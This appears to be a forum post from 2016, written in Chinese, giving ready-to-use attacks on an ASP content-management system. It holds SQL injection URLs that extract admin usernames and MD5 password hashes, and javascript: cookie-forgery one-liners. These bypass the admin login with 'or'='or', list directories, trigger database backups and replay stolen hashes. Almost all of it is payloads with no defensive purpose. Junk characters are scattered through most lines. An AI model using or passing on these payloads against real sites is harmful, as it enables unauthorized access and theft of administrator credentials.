一、注入4 Y; @$ S1 _/ \0 b4 W1 O5 @
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=24 Z3 Z1 e" T `# k1 i, z
/ {- N- K( w# B; j0 S# m2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" ! q* d- W9 h* @. p1 \0 y5 m
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
6 {6 _# z. M+ q) U& I. g可得到用户名和MD5加密码的密码。
# D, i& \! @- F4 }" M+ d$ G5 A$ h' P
二、cookies欺骗
0 `* C0 s8 T6 S' p; g( ]: d3 A( C& V' n0 T. s
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
! c. `; l$ ^" a- K9 G5 ?javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
, Z5 Z7 B$ x3 W0 ]( q
: j+ t# |" W: P3 ]3 k" B/ l0 N2、列目录.
+ ^. j$ Q; y8 [- O6 O4 E3 H# `javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
# `( X- ?6 h( ]+ |# j: W- V# e. ^2 M
3、数据库备份(适用性好像比较低.) 2 d$ V% E9 i$ a% l$ q! n8 f- ]
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata". [( S5 h5 E# ^" v
9 `5 s7 O( A5 A# p; g- u
4、得到MD5密码解不了密进后台方法
: U2 ~6 S4 @6 t/ S. s5 h- {javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
, `; ^' l. O6 G |
发表于 2016-5-11 14:55:08
收藏
分享
支持
反对